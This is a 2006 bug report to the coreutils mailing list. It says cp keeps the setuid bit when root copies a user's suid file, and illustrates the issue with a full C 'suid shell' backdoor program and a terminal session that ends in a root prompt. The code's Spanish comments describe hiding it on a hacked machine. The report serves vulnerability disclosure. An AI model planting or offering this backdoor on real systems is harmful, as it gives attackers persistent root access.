Permissions over suid files

bug-coreutils

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Permissions over suid files

From:	Pedro Andujar
Subject:	Permissions over suid files
Date:	Mon, 2 Oct 2006 16:15:41 +0200

Hello,

When root is copying a non-privileged user file with the bit suid on,
the file gets "chowned" to root and bit suid is not removed.

That could mean a security compromise.

Example:

address@hidden ~]$ cat > c.c
/* Suid shell || uid=0(root) gid=0(root) || Lo compilas y ocultas
* en la maquina hackeada. Despues: "chmod 6755 suidshell", todo
* esto como root. Crg
*/

#include <stdio.h>
#define root 0

main()
{
   system("clear");
   printf("Now you are r00t!!\n\n");
   seteuid(root);
   setuid(root);
   setgid(root);
/* cambiar "/bin/bash" por "/bin/sh" en caso que el sistema no tuviera bash */
   system("/bin/bash");
}


address@hidden ~]$ make c
cc     c.c   -o c
address@hidden ~]$ chmod 6755 c


**now root**

address@hidden tmp]# cp /home/pandujar/c ./
address@hidden tmp]# ls -l c
-rwsr-sr-x  1 root root 5172 Oct  2 16:13 c


**user again**

address@hidden ~]$ /tmp/c


Now you are r00t!!

address@hidden ~]#


Other tools like "chown" have this kind of protection:

address@hidden tmp]# cd /home/pandujar/
address@hidden pandujar]# ls -l c
-rwsr-sr-x  1 pandujar tiger 5172 Oct  2 16:13 c
address@hidden pandujar]# chown root.root c
address@hidden pandujar]# ls -l c
-rwxr-xr-x  1 root root 5172 Oct  2 16:13 c

[Prev in Thread]

Current Thread

[Next in Thread]

Permissions over suid files, Pedro Andujar <=
- Re: Permissions over suid files, Crg, 2006/10/02

Prev by Date: Re: [bug #17900] rm -f should ignore ENOTDIR
Next by Date: Re: Permissions over suid files
Previous by thread: [bug #17900] rm -f should ignore ENOTDIR
Next by thread: Re: Permissions over suid files
Index(es):
- Date
- Thread